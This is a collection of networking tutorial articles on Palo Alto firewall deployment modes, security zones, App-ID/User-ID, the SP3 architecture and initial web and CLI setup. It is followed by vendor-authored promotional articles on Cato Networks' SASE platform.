Tap mode offers visibility of application, user and content, however, we must be mindful that the firewall is unable to control the traffic as no security rules can be applied in this mode. Tap mode simply offers visibility in the ACC tab of the dashboard. The catch here is to ensure that the tap interface is assigned to a security zone.

Virtual Wire  (V-Wire) Deployment Option

Virtual Wire, also know as V-Wire, deployment options use Virtual Wire interfaces. The great thing about V-Wire deployment is that the firewall can be inserted into an existing topology without requiring any changes to the existing network topology.

The V-Wire deployment options overcome the limitations of TAP mode deployment, as engineers are able to monitor and control traffic traversing the link. A Virtual Wire interface supports App-ID, User-ID, Content-ID, NAT and decryption.

 Palo Alto Next Generation Firewall deployed in V-Wire mode

Figure 2. Palo Alto Next Generation Firewall deployed in V-Wire mode

Layer 2 Deployment Option

Palo Alto Networks Next Generation Firewall can also be deployed in Layer 2 mode. In this mode switching is performed between two or more network segments as shown in the diagram below:

 Palo Alto Next Generation Firewall deployed in Layer 2 mode

Figure 3. Palo Alto Next Generation Firewall deployed in Layer 2 mode

In Layer 2 deployment mode the firewall is configured to perform switching between two or more network segments. Traffic traversing the firewall is examined, as per policies, providing increased security and visibility within the internal network.

In this mode the firewall interfaces are capable of supporting Access or Trunk Links (802.1Q trunking) and do not participate in the Spanning Tree topology. Any BPDUs received on the firewall interfaces are directly forwarded to the neighboring Layer 2 switch without being processed. Routing traffic between VLAN networks or other networks can be achieved via a default Gateway which is usually a Layer 3 switch supporting InterVLAN routing, a Firewall security appliance, or even Router-on-a-Stick design.

Layer 3 Deployment Option

Layer 3 deployment mode is a popular deployment setup. In this mode the firewall routes traffic between multiple interfaces, each of which is configured with an IP address and security zone. The Firewall interfaces can also be configured to obtain their IP address via a DHCP server and can be used to manage the security appliance.

 Palo Alto Next Generation Firewall deployed in Layer 3 mode

Figure 4 – Palo Alto Next Generation Firewall deployed in Layer 3 mode

The diagram above shows a typical Layer 3 deployment setup where the Firewall routes and controls traffic between three different IP networks. Similar to other setup methods, all traffic traversing the Firewall is examined and allowed or blocked according to the security policies configured.

Summary

In this article we examined a few of the different deployment modes available for Palo Alto firewalls. We talked about Tap mode, Virtual Wire mode, Layer 2 and Layer 3 deployment modes. Each deployment method is used to satisfy different security requirements and allows flexible configuration options. Visit our Palo Alto Firewalls Section for more in-depth technical articles.

  • Hits: 108261

Palo Alto Firewalls Security Zones – Tap Zone, Virtual Wire, Layer 2 and Layer 3 Zones

Palo Alto Networks Next-Generation Firewalls rely on the concept of security zones in order to apply security policies. This means that access lists (firewall rules) are applied to zones and not interfaces – this is similar to Cisco’s Zone-Based Firewall supported by IOS routers.

Palo Alto Networks Next-Generation Firewalls zones have no dependency on their physical location and they may reside in any location within the enterprise network. This is also illustrated in the network security diagram below:

Palo Alto Firewall Security Zones can contain networks in different locations 

Figure 1. Palo Alto Firewall Security Zones can contain networks in different locations

The above topology illustrated shows VLANs 10, 11 ,12 and 2 managed by a Cisco Catalyst 4507R+E Switch and are all part of OSPF Area 0 and visible as routes in the Palo Alto Firewall. A Layer 3 aggregated link has been created between the Palo Alto Firewall (Interface ae1 on each firewall) and the Cisco 4507R+E Switch (Port-Channel 1 & 2).

When aggregation interface ae1.2 on the Palo Alto Firewall is configured to be part of the DMZ Security Zone, all networks learnt by the OSPF routing protocol on interface ae1.2 will be part of the DMZ Security Zone.

Creating a Security Zone involves tasks such as naming the zone, assigning the interfaces to the new zone created and more. Palo Alto Networks Next-Generation Firewalls won’t process traffic from any interface unless they are part of a Security Zone.

The diagram below depicts the order in which packets are processed by the Palo Alto Firewall:

Initial Packet Processing – Flow Logic of Palo Alto Next-Generation Firewall

Figure 2. Initial Packet Processing – Flow Logic of Palo Alto Next-Generation Firewall

It is without doubt Zone based firewalls provide greater flexibility in security design and are also considered easier to administer and maintain especially in large scale network deployments.

Palo Alto Networks Next-Generation Firewalls have four main types of Zones namely as shown in the screenshot below:

  • Tap Zone. Used in conjunction with SPAN/RSPAN to monitor traffic.
  • Virtual Wire. Also known as Transparent Firewall.
  • Layer 2. Used when switching between two or more networks.
  • Layer 3. Used when routing between two or more networks. Interfaces must be assigned an IP address.

Types of Security Zones in Palo Alto Firewalls 

Figure 3. Types of Security Zones in Palo Alto Firewalls

Palo Alto Networks Next-Generation Firewalls have special zone called External which is used to pass traffic between Virtual Systems (vsys) configured on the same firewall appliance. The External zone type is only available in the Palo Alto Networks Next-Generation Firewalls which are capable of Virtual Systems and also the External Zone is visible only when the multi-vsys feature is enabled.

Creating A Security Zone

This section focuses on creating different types of Security zones in Palo Alto Networks Next-Generation Firewalls

Step 1. Login to the WebUI of Palo Alto Networks Next-Generation Firewall

Step 2. From the menu, click Network > Zones > Add

Creating a new Zone in a Palo Alto Firewall

Figure 4. Creating a new Zone in Palo Alto Firewall

Step 3. Provide the name for the new Zone, and select the zone type and click OK:

Creating a zone in a Palo Alto Firewall

Figure 5. Creating a zone in a Palo Alto Firewall

In a similar manner we can repeat steps 1 to 3 to create Tap, Virtual Wire or Layer 2 security zones.

Finally it is important to note that the zone names is case sensitive, so one needs to be careful as the zone FiewallCX and firewallcx are considered different zones:

Identically named Security zones using different letter cases result in different Security zones

Figure 6. Identically named Security zones using different letter cases result in different Security zones

 Example of case sensitive security zones with identical zone names

Figure 7. Example of case sensitive security zones with identical zone names

Creating a security zone in Palo Alto Networks Next-Generation Firewalls involves three steps:

Step 1. Specify the Zone name

Step 2. Select the Zone type

Step 3. Assign the Interface

The interfaces part will be dealt in upcoming posts as one need to understand types of interfaces Palo Alto Networks Next-Generation Firewalls offers and how they work.

In Palo Alto Networks Next-Generation Firewalls zone names have no predefined meaning or policy associations, basically they are created to group the services by functions for examples one can group all the Domain Controllers in one security group no matter even if they are part of different networks.

 Example of grouping Domain Controllers in same security zone – DMZ

Figure 8. Example of grouping Domain Controllers in same security zone – DMZ

As mentioned Palo Alto Networks Next-Generation Firewalls works with the principle of Security zones, by default Intra-Zone traffic is allowed and Inter-Zone traffic is denied. More technical articles can be found in our Palo Alto Network Firewall section.

  • Hits: 76471

Palo Alto Firewall Application-based Policy Enforcement (App-ID), User Identification (User-ID) and Application Control Centre (ACC) Features for Enterprise Networks

Our previous article examined the benefits of Palo Alto Networks Firewall Single Pass Parallel Processing (SP3) architecture and how its combine with the separate Data and Control planes to boost firewall performance and handle large amounts of traffic without and performance impact. This article focuses on the traffic flow logic inside the Palo Alto Firewall and two unique features that separate it from the competition: Application-based policy enforcement (App-ID) & User Identification (User-ID).

For more Technical articles on Palo Alto Networks Firewalls, visit our Palo Alto Networks Firewall Section.

Flow Logic Of The Next-Generation Firewall

The diagram below is a simplified version of the flow logic of a packet travelling through a Palo Alto Networks Next-Generation Firewall and this can be always used a reference to study the packet processing sequence:

palo-alto-firewall-app-id-user-id-application-control-centre-1

Figure 1. Flow Logic of a packet inside the Palo Alto Networks Next Generation Firewall

Palo Alto Networks Next-Generation Firewalls works with the concepts of zones not interfaces, once a packet enters the firewall, the Palo Alto Networks Next-Generation Firewalls identifies from which zone the packet came and where it is destined to go. This is similar to Cisco IOS Routers Zone-based Firewalls and Cisco ASA Firewalls.

Users interested can also download for free the Palo Alto Networks document “Day in the Life of a Packet” found in our Palo Alto Networks Download section which explains in great detail the packet flow sequence inside the Palo Alto Networks Firewall.

App-ID & User-ID – Features That Set Palo Alto Apart From The Competition

App-ID and User-ID are two really interesting features not found on most competitors’ firewalls and really help set Palo Alto Networks apart from the competition. Let’s take a look at what App-ID and User-ID are and how they help protect the enterprise network.

App-ID: Application-based Policy Enforcement

App-ID is the biggest asset of Palo Alto Networks Next-Generation Firewalls. Traditional firewalls block traffic based on protocol and/or ports, which years ago seemed to be the best way of securing the network perimeter, however this approach today is inadequate as applications (including SSL VPNs) can easily bypass a port-based firewall by hopping between ports or using well-known open ports such as tcp-http (80) or tcp/udp-dns (53) normally found open.

A traditional firewall that allows the usage of TCP/UDP port 53 for DNS lookups, will allow any application using that port to pass through without asking second questions. This means that any application can use port 53 to send/receive traffic, including evasive applications like BitTorrent for P2P file sharing, which is quite dangerous:

Palo Alto Network’s App-ID effectively blocks unwanted BitTorrent traffic

Figure 2. Palo Alto Network’s App-ID effectively blocks unwanted BitTorrent traffic

With App-ID, Palo Alto Networks Next-Generation Firewalls uses multiple identification mechanisms to determine the exact identity of applications traversing the network. Following is the order in which traffic is examined and classified:

  1. Traffic is classified based on the IP Address and port
  2. Signatures are then applied to the allowed traffic to identify the application based on unique application properties and related transaction characteristics.
  3. For evasive applications which cannot be identified though advance signature and protocol analysis Palo Alto Networks Next-Generation Firewalls applies heuristics or behavioral analysis to determine the identity of the application.

Using the above process Palo Alto Networks Next-Generation Firewalls are very successful in identifying DNS traffic not only at the port level but also at the Application level, making it extremely difficult for an evasive application like BitTorrent to use any open ports and pass through the firewall undetected.

User Identification (User-ID)

User-ID is one more key determining factor that places Palo Alto Networks Next-Generation Firewalls apart from the competition.

Traditionally, security policies and rules were applied based on IP addresses. However, these days both the users and applications have a dynamic nature which means that IP addresses alone have become inefficient for monitoring and controlling user activity. A single user might access the network from multiple devices (laptops, tablets, smartphones, servers).

Thanks to the User-ID feature of the Palo Alto Networks Next-Generation Firewalls administrators are able to configure and enforce firewall policies based on users and user groups instead of network zones and addresses.

The Palo Alto Networks Next-Generation Firewall can communicate with many directory servers, such as Microsoft Active Directory, eDirectory, SunOne, OpenLDAP, and most other LDAP-based directory servers to provide user and group information to the firewall. With this powerful feature, large organizations are able to create security policies that are user or group based, without worrying about IP addresses associated to them.

Threat Prevention

Palo Alto Networks Next-Generation Firewalls are very effective in preventing threats and they do offer real-time threat prevention from viruses, worms, spyware, and other malicious traffic can be varied by application and traffic source.

Application Command Control (ACC)

Palo Alto Networks Next-Generation Firewalls offer the most interactive graphical summary of the applications, URLs, users, threats, and content traversing the network. The ACC makes use of the firewall logs to provide the visibility of the traffic patterns, information on threats, user activity, Rule usage and many other information in an interactive graphical form:

Palo Alto Application Command Center provides maximum visibility on network traffic (click to enlarge)Figure 3. Palo Alto Application Command Center provides maximum visibility on network traffic (click to enlarge)

Summary

This article why Palo Alto Networks Next-Generation Firewalls are really unique in many terms. Features such as App-ID and User-ID allow in-depth control of applications and users, making it possible to fully manage small to very large enterprises without a problem. The Application Command Control (ACC) helps give the administrator a complete view of applications and services accessing the internet alongside with some very useful statistics. To discover more in-depth technical articles on Palo Alto Networks Firewalls, please visit our Palo Alto Networks Firewall section.

  • Hits: 56304

The Benefits of Palo Alto Networks Firewall Single Pass Parallel Processing (SP3) and Hardware Architecture

What makes Palo Alto Networks Next-Generation Firewall (NGFW) so different from its competitors is its Platform, Process and Architecture. Palo Alto Networks delivers all the next generation firewall features using the single platform, parallel processing and single management systems, unlike other vendors who use different modules or multiple management systems to offer NGFW features.

More technical and how-to articles covering Palo Alto's Firewalls can be found in our Palo Alto Networks Firewall Section

Palo Alto Networks Next-Generation Firewall’s main strength is its Single Pass Parallel Processing (SP3) Architecture, which comprises two key components:

  1. Single Pass Software
  2. Parallel Processing Hardware

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-1

Figure 1.   Palo Alto Networks Firewall Single Pass Parallel Processing Architecture

Single Pass Software

Palo Alto Networks Next-Generation Firewall is empowered with Single Pass Software, which processes the packet to perform functions like networking, user identification (User-ID), policy lookup, traffic classification with application identification (App-ID), decoding, signature matching for identifying threats and contents, which are all performed once per packet as shown in the illustration below:

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-2

Figure 2: Palo Alto Networks Firewall - Single-Pass Architecture Traffic Flow

This processing of a packet in one go or single pass by Palo Alto Networks Next-Generation Firewall enormously reduces the processing overhead, other vendor firewalls using a different type of architecture produce a significantly higher overhead when processing packets traversing the firewall. It’s been observed that the Unified Threat Management (UTM), which processes the traffic using multi-pass architecture, results in process overhead, latency introduction and throughput degradation.

The diagram below illustrates the multi-pass architecture process used by other vendors’ firewalls, clearly showing differences to the Palo Alto Networks Firewall architecture and how the processing overhead is produced:

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-3

Figure 3: Traffic Flow for multi-pass architecture resulting in additional overhead processing

Palo Alto Networks Next-Generation Firewall Single Pass Software scans the contents based on the same stream and it uses uniform signature matching patterns to detect and block threats. By adopting this methodology Palo Alto Networks Next-Generation Firewall is negating the use of separate scan engines and signature sets, which results in low latency and high throughput.

Parallel Processing Hardware

Palo Alto Networks Parallel Processing hardware ensures function-specific processing is done in parallel at the hardware level which, in combination with the dedicated Data plane and Control plane, produces stunning performance results. By separating the Data plane and Control plane, Palo Alto Networks is ensuring heavy utilization of either plane will not impact the overall performance of the Platform. At the same time, this means there is no dependency on either plane as each has its own CPU and RAM as illustrated in the diagram below:

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-4

Figure 4: Palo Alto Networks Firewall Hardware Architecture – Separation of Data Plane and Control Plane

The Control Plane is responsible for tasks such as management, configuration of Palo Alto Networks Next-Generation Firewall and it takes care of logging and reporting functions.

Palo Alto Networks Next-Generation Firewall offers processors dedicated to specific functions that work in parallel. The Data Plane in the high-end models contains three types of processors (CPUs) connected by high-speed 1Gbps busses.

The three type of processors are:

  1. Security Matching Processor: Dedicated processor that performs vulnerability and virus detection.
  2. Security Processor: Dedicated processor that performs hardware acceleration and handles security tasks such as SSL decryption, IPsec decryption and similar tasks.
  3. Network Processor: Dedicated processor responsible for network functions such as routing, NAT, QOS, route lookup, MAC Lookup and network layer communications.

Summary

Palo Alto Networks unique architecture and design has played a significant role in helping place it apart from the rest of its competitors. Its Single Platform Parallel Processing architecture coupled with the single management system results in a fast and highly sophisticated Next-Generation Firewall that won’t be left behind anytime soon. For more technical information and articles covering configuration and technical features of the Palo Alto Networks Firewall, visit our Palo Alto Networks Firewall Section.

  • Hits: 93661

Palo Alto Networks Firewall - Web & CLI Initial Configuration, Gateway IP, Management Services & Interface, DNS – NTP Setup, Accounts, Passwords, Firewall Registration & License Activation

This article is the second-part of our Palo Alto Networks Firewall technical articles. Our previous article was introduction to Palo Alto Networks Firewall appliances and technical specifications, while this article covers basic IP management interface configuration, DNS, NTP and other services plus account password modification and appliance registration and activation.

The introduction of Next Generation Firewalls has changed the dimension of management and configuration of firewalls, most of the well-known Firewall vendors have done a major revamp, be it the traditional command line mode or the GUI mode.

Palo Alto Networks is no different to many of those vendors, yet it is unique in terms of its WebUI. It’s a whole new experience when you access the WebUI of Palo Alto Networks Next-Generation Firewalls.

In order to start with an implementation of the Palo Alto Networks Next-Generation Firewalls one needs to configure them. Palo Alto Networks Next-Generation Firewalls can be accessed by either an out-of-band management port labelled as MGT or a Serial Console port (similar to Cisco devices). By using the MGT port, one can separate the management functions of the firewall from the data processing functions. All initial configurations must be performed either on out-of-band management interface or by using a serial console port. The serial port has default values of 9600-N-1 and a standard roll over cable can be used to connect to a serial port.

 Palo Alto Networks Firewall PA-5020 Management & Console Port 

Figure 1.   Palo Alto Networks Firewall PA-5020 Management & Console Port

By default, Palo Alto Networks Next-Generation Firewalls use MGT port to retrieve license information and update the threats and application signature, therefore it is imperative the MGT port has proper DNS settings configured and is able to access the internet.

Note: The instructions below apply to all Palo Alto Firewall models!

To access the Palo Alto Networks Firewall for the first time through the MGT port, we need to connect a laptop to the MGT port using a straight-thru Ethernet cable. By default, the web gui interface is accessed through the following IP Address and login credentials (note they are in lower case):

  • MGT Port IP Address: 192.168.1.1 /24
  • Username: admin
  • Password: admin

For security reasons it’s always recommended to change the default admin credentials. Until this condition is satisfied, the Palo Alto Networks Firewall alerts the administrator to change the default password every time he logs in, as shown in the screenshot below:

 Palo Alto Networks Firewall alerts the administrator to change the default password

Figure 2. Palo Alto Networks Firewall alerts the administrator to change the default password

Performing The Initial Setup In Palo Alto Networks Firewall Check List

Below is a list of the most important initial setup tasks that should be performed on a Palo Alto Networks Firewall regardless of the model:

  • Change the default login credentials
  • Configure the management IP Address & managed services (https, ssh, icmp etc)
  • Configure DNS & NTP Settings
  • Register and Activate the Palo Alto Networks Firewall

Let’s take a look at each step in greater detail.

Change The Default Login Credentials

Step 1: Establish connectivity with the Palo Alto Networks Firewall by connecting an Ethernet cable between the Management and the laptop’s Ethernet interface.

Step 2: Configure the laptop Ethernet interface with an IP address within the 192.168.1.0/24 network. Keep in mind that we’ll find the Palo Alto Networks Firewall at 192.168.1.1 so this IP must not be used.

Step 3: Open a web browser and navigate to the URL https://192.168.1.1 – Take note that this is an HTTPS site. At this point the Palo Alto Networks Firewall login page appears.

Step 4: Enter admin for both name and password fields.

Step 5: From the main menu, click Device > Administrators > admin

  • Type the old password in the Old Password field
  • Type the new password in the New Password field
  • Type new password in the Confirm New Password field
  • Click ok

Configure The Management IP Address & Management Services (HTTPS, SSH, ICMP)

At this point we have connectivity to the Palo Alto Networks Firewall and need to change the management IP address:

Step 1: Logon to the Palo Alto Networks Firewall using the new credentials entered in the previous section.

Step 2: From the web interface click Device > Setup > Management and select the Management Interface Settings radio button as shown below:

Accessing the Palo Alto Networks Firewall Management IP Address tab

Figure 3. Accessing the Palo Alto Netowkrs Firewall Management IP Address tab

Next, change the IP Address accordingly and enable or disable any management services as required. HTTPS, SSH and Ping (ICMP) are enabled by default. When ready click ok:

Changing the Management IP Address & services on the Palo Alto Networks Firewall

Figure 4. Changing the Management IP Address & services on the Palo Alto Networks Firewall

Step 3: Now click on Commit on the top right corner to save and commit the changes to the new configuration

Configure DNS & NTP Settings In Palo Alto Networks

This section assumes all previous steps have been completed and we are currently logged into the Palo Alto Networks Firewall web interface.

Step 1: From the menu, click Device > Setup > Services and configure the DNS Servers as required. When ready, click on OK:

Configuring DNS Settings on Palo Alto Networks firewall

Figure 5. Configuring DNS Settings on Palo Alto Networks firewall

Step 2: Click on the Commit button on the top right corner to commit the new changes.

Configure Management IP Address, Default Gateway, DNS & NTP Settings CLI (PAN-OS)

Similar to Cisco devices, Palo Alto Networks devices can be configured by web or CLI interface. While CLI interface tends to be slightly more challenging it does provides complete control of configuration options and extensive debugging capabilities.

This section shows how to configure your Palo Alto Networks firewall using the console port. The computer’s serial port must have the following settings to correctly connect and display data via the console port:

Step 1: Login to the device using the default credentials (admin / admin).

Step 2: Enter configuration mode by typing configure:

admin@PA-3050> configure

Step 3: Configure the IP address, subnet mask, default gateway and DNS Severs by using following PAN-OS CLI command in one line:

admin@PA-3050# set deviceconfig system ip-address 192.168.1.10 netmask 255.255.255.0 default-gateway 192.168.1.1 dns-setting servers primary 8.8.8.8 secondary 4.4.4.4

Step 4: Commit changes

admin@PA-3050# commit

Registering & Activating Palo Alto Networks Firewall

This section assumes all previous steps have been completed and we are currently logged into the Palo Alto Networks Firewall web interface.

Step 1: Click Dashboard and look for the serial information in the General Information Widget,

If the widget is not added, click on Widgets > Systems > General Information:

Adding Widgets to the Palo Alto Networks Firewall Web Interface

Figure 6. Adding Widgets to the Palo Alto Networks Firewall Web Interface

Step 2: Create a support account with Palo Alto Support.

Registering your Palo Alto Networks device is essential so you can receive product updates, firmware upgrades, support and much more.

First we need to create an account at https://support.paloaltonetworks.com and then proceed with the registration of our Palo Alto Networks Firewall device, during which we’ll need to provide the sales order number or customer ID, serial number of the device or authorization code provided by our Palo Alto Networks Authorized partner.

Further details about registration and activation process can be found in our article How to Register a Palo Alto Firewall and Activate Support, Subscription Services & Licenses. Covers All Models. 

Step 3: Activate the license by clicking Device > License and select Activate feature using authorization code:

Activating the Palo Alto Networks Firewall license

Figure 7. Activating the Palo Alto Networks Firewall license

When prompted, enter the Authorization Code and then click OK.

Finally, verify that the license was successfully activated.

Once the Palo Alto Networks Firewall is activated, it is ready for configuration according to our business’s needs.

This article showed how to configure your Palo Alto Networks Firewall via Web interface and Command Line Interface (CLI). We covered configuration of Management interface, enable/disable management services (https, ssh etc), configure DNS and NTP settings, register and activate the Palo Alto Networks Firewall. For more in-depth technical articles make sure to visit our Palo Alto Networks Firewall section.

  • Hits: 244683

Introduction to Palo Alto Next-Generation Network Firewalls

palo-alto-firewalls-introduction-features-technical-specifications-1aDuring the past decade, we’ve seen the global IT security market flooded with new network security and firewall security appliances. New vendors emerging into the market while existing well-known vendors introduce new smarter and complex firewalls that aim to keep enterprise organizations as safe as possible. Palo Alto Networks is one of the new-generation security vendors who have managed to break into a saturated market and make their stand.

It’s no coincidence that Palo Alto Networks is considered to be a leader and pioneer when it comes to Next Generation Firewall appliances and Gartner seems to agree with this statement based on their Magic Quadrant report in the Next Generation Firewall Segment:

Magic Quadrant for Enterprise Network Firewalls

Figure 1. Gartner Magic Quadrant for Enterprise Network Firewalls

Palo Alto Networks Next-Generation Firewalls unique way of processing a packet using the Single ­­­Pass Parallel Processing (SP3) engine makes them a clear leader.

Note: Read all our technical articles covering Palo Alto Firewalls by visiting our Palo Alto Firewall Section.

Basically, the SP3 engine utilizes the same stream-based signature format to process the protection features like Anti-Virus, Spyware, Vulnerability Protection and Data Filtering. By doing so the firewall saves valuable processing power, unlike other Unified Threat Management (UTM) appliances which serially process each security feature offered, this often introduces latency to the network traffic.

The advanced security features like App-ID, User-ID, Content-ID along with Security profiles, comprising feature like Antivirus, Anti-Spyware, Vulnerability protection, URL Filtering, DoS Protection and Data Filtering makes Palo Alto the leader. Most importantly its malware analysis solution WildFire offers advanced protection from unknown threats.

Palo Alto Networks offers its firewalls as Hardware Platforms and Virtual Platforms. Its Hardware Platforms comes in different flavors.

palo-alto-firewalls-introduction-features-technical-specifications-2

Figure 2. The Palo Alto Firewall family

PA-200 and PA-500 Series Firewalls are meant for Small Businesses and come with very limited throughput and do not support Virtual Systems. Virtual Systems, also known as VSYS, is used to create virtual firewall instances in a single-pair of Palo Alto Firewalls, in other words, Virtual Systems can be compared to contexts in Cisco ASA Firewalls or vdom in Fortinet firewalls. The PA-200, PA-500 Series Firewalls offer a very limited number of security policies like security rules, NAT rules, policy based forwarding rules and a few more.

Datasheets on Palo Alto Firewall appliances and Virtual Servers are available at our Palo Alto Datasheets and Guides download area

The table below provides a clear comparison of features and technical specifications of both PA-500 and PA-200 firewall models:

Continue reading

  • Hits: 60090

The Need for a Converged SASE Platform. Converging Network & Security Services with Catonetworks SASE Platform

SASE Converged Network - CatonetworksThe digital transformation is pushing applications to the cloud, the 2020-2022 pandemic shifted employees to work from home, and the number of resulting new use cases is sending IT leaders scrambling for answers. The number of solutions IT departments have had to adopt to ensure their network's performance and security has continuously grown for over a decade.

The recent trends have greatly accelerated this process. When looking into ways to help mitigate this complexity, one of the leading conclusions is that enterprises should find ways to consolidate their separate, stand-alone, products into a unified solution which can be more easily managed and maintained, and which can provide them with a consistent and a holistic view of all traffic in their network.

Gartner has gone a step further and designed a framework that facilitates this, which they named the Secure Access Service Edge (SASE). SASE is, in essence, an architecture that converges networking and security capabilities into a single solution and goes a long way in reducing network complexity.

what is sase

Before we talk about the networking and security services that SASE converges, let's first look at the entities and traffic flows they need to serve.

The journey starts at any of the enterprise's endpoints which need to access any of the enterprise's assets or external resources. The origin endpoints are typically users who can connect from any of the enterprise's physical locations or remotely. Physical locations are typically enterprise headquarters or branch offices, which connect between themselves or to other enterprise locations such as physical or cloud-based datacenters. Enterprises typically use an MPLS and/or SD-WAN product to connect their physical locations:

Traditional MPLS VPN Network

Traditional MPLS VPN Network

Mobile & Remote users will use a remote access solution to connect to their networks. Cloud-based services such as AWS, Azure will require virtual connectors, or other secure tunnel solutions to connect to the enterprise network and remote offices use a private managed MPLS service to connect to the headquaters.

As we can see, a modern digital enterprise needs to connect various types of endpoints that are spread across multiple locations.

So how is it possible to converge network and security services for such a dispersed network topology?

The only real option, as Gartner stated, is to use a cloud service to which all network endpoints can connect and which is capable of delivering all required services. This is precisely what Cato's SASE Cloud platform offers:

SD-WAN SASE Network Architecture

SASE Architecture Example

Continue reading

  • Hits: 21722

Key Features of a True Cloud-Native SASE Service. Setting the Right Expectations

key features of true cloud SASE providersSecure Access Service Edge (SASE) is an architecture widely regarded as the future of enterprise networking and security. In previous articles we talked about the benefits of a converged, cloud-delivered, SASE service which can deliver necessary networking and security services to all enterprise edges. But what does "cloud delivered" mean exactly? And are all cloud services the same?

We’ll be covering the above and more in this article:

Related Articles:

Defining Cloud-Native Services

While we all use cloud services daily for both work and personal benefit, we typically don't give much thought to what actually goes on in the elusive place we fondly call "the cloud". For most people, "the cloud" means they are just using someone else’s computer. For most cloud services, this definition is a good enough, as we don't need to know, nor care, about what they do behind the scenes.

For cloud services delivering enterprise networking and security services, however, this matters a lot. The difference between a true cloud-native architecture and software simply deployed in a cloud environment, can have detrimental impact on the availability, stability, performance, and security of your enterprise. 

Let's take a look at what cloud-native means, and the importance it plays in our network.

Continue reading

  • Hits: 24076

Converged SASE Backbone – How Leading SASE Provider, Cato Networks, Reduced Jitter/Latency and Packet Loss by a Factor of 13!

sase introGlobal connectivity is top of mind for many IT teams at organizations of all sizes. We are currently in the middle of a dramatic shift in business and technology practice, as users are becoming more mobile while applications are being transitioned to the cloud.  This shift will only accelerate as companies will look to leverage the speed and agility of cloud services with the operational, cost and quality advantages of a geographically distributed work force. While Covid-19 has contributed to the acceleration of this shift, the change was always inevitable once technology was ready. Legacy connectivity and security products have long been a barrier to progress.

Key Topics:

SASE is the Answer

With uncanny timing, Gartner introduce the Secure Access Service Edge or SASE near the end of 2019, just before the Covid-19 virus started to gain global traction. SASE represents the shift away from castle & moat security with resources siloed into just a few corporate datacenters. After all, if organizations are consuming collaboration and productivity tools from the cloud, why not security and connectivity too?

While there is much buzz around SASE with security and networking vendors, and some debate over what products and services fit the SASE moniker, the intention is simple: leveraging economies of scale, organizations should purchase SASE as a cloud delivered service with global presence that brings security closer to the user. The user can be remote, mobile or in a corporate owned facility, regardless of physical location, the user’s access and security posture should remain consistent.

cato sase pop mapFigure 1: Cato PoP Map (click to enlarge)

At Cato Networks we built the first SASE solution, starting way back in 2015. We’ve grown to 70+ Point-of-Presence (PoPs) globally that fully converge networking and security into a single platform. With our experience we believe that a global private backbone is an essential component of a true SASE solution. If we consider that the goal is consistent access and security with reduced cost and complexity, we must recognize that the ability of a user to access resources applies not just to access controls and services, but also to the usability and reliability of that user’s access. Essentially –users must have predictable performance to be productive.

A Converged Private Backbone is Essential

Reliability and predictability of connectivity isn’t a new concept or focus area for technical teams. Organizations have been using MPLS and other methods to achieve this for years. But MPLS is expensive, resulting in reliable, low bandwidth links to just a few places. Don’t forget that this approach completely neglected remote users who traditionally have had to VPN across the public Internet to reach datacenter security and resources.

Fast forwarding to today, most SASE vendors position their services as a way to reduce or eliminateMPLS, but completely ignore the unpredictability of the public Internet. Cato’s service was architected with this in mind, and we connected our PoPs with a global private backbone of multiple tier 1 providers. Our customer’s packets aren’t taking the cheapest possible route across tier 3 providers, instead taking the most efficient route to the destination. Combined with our WAN optimization capabilities, Cato ensures reliable, predictable performance for all users and locations.

Cato Networks - Network RulesFigure 2: Cato Network Rules (click to enlarge)

The easiest way to see if a SASE vendor has a converged private backbone is to look at their management console. Your vendor should enable you to make granular Internet & WAN rules to manage the handling and routing of your traffic. In addition to priority level, you should be able to control egress PoP location, even egressing your traffic from dedicated private IP addresses, and enabling things like TCP optimization and packet loss mitigation.  

Cato Networks - Network Rule CriteriaFigure 3: Network Rule Criteria (click to enlarge)

 

Cato Networks - Network Rule ActionsFigure 4: Network Rule Actions (click to enlarge)

Having the ability to configure these policies directly in the management interface demonstrates that the backbone is a converged component of the solution. You should not have to open tickets and wait for routing policies to be created on your behalf, instead you should have direct control with the ability to deploy or modify policies in real-time.

Controlling egress location allows you to maximize your utilization of Cato’s global private backbone, egressing your traffic as close to the destination as possible. The ability to use dedicated private IP addresses mean that you can use source-IP anchoring policies for SaaS application security, without having to backhaul your traffic anywhere.

The ability to create and manage your WAN and Internet traffic with policies is key, but also essential is understanding how these policies are impacting your traffic and real-time visibility into performance. Cato allows you real-time views into performance, priority level and application usage. These insights are invaluable in ensuring your policies are meeting your organization’s needs or evaluating potential changes that may be required.

Cato Networks - Traffic Priority AnalyzerFigure 5: Traffic Priority Analyzer (click to enlarge)

The Proof is in the Packets – Testing a Converged SASE Solution

To demonstrate the real-world implications of a converged SASE solution with a global private backbone, we ran PingPlotter to a server in China over a 48-hour period using both the public Internet and Cato’s backbone. Connectivity into China is usually complex due to regulation and the great firewall, but Cato’ PoP network can easily enable organizations access into and out of China (Cato has 3 PoPs in China and a government approved link to Hong Kong).

As you can see below, the results speak for themselves. When utilizing Cato’s backbone, we had only 20ms of Jitter, down from 260ms on the public Internet. We also had much less packet loss with our connection being far more reliable and consistent. You can just imagine the difference in user experience when using file sharing, VOIP or collaboration tools:

CatoNetworks - SASE Private Global Network China testFigure 6: PingPlotter Tests (click to enlarge)

Summary

The promise of SASE is to bring security and connectivity to all edges with less cost and complexity. To do this effectively, a SASE vendor must have a global private backbone. At Cato, we built our SASE cloud from the ground up, fully converging networking and security into a single platform delivered from 70+ global PoPs that are connected by a private backbone composed of multiple Tier 1 providers. Cato allows you to quickly connect and secure users and locations at global scale with ease.

More information on SD-WAN and SASE can be found in our dedicated SASE and SD-WAN section.

  • Hits: 38836

Configuring A SASE Unified Network: Data centers, Remote Sites, VPN Users, and more

sase introductionThis article explores the need for Secure Access Service Edge (SASE) in today’s organizations. We show how one of the most advanced SASE platforms available, combines VPN and VPN and SD-WAN capabilities with cloud-native security functions to quickly and securely connect On-premises data centers, cloud data centers, branch offices, and remote users.

Before we dive any further, let’s take a look at what’s covered:

Related Articles

SASE: The Architecture for a Secure Cloud and Mobile World

IT and security managers are constantly concerned by the different entities which connect to their networks. Keeping track of who is connecting, using which edge device type, what they’re connecting to, and which permissions they should have can be a messy and dangerous business.  

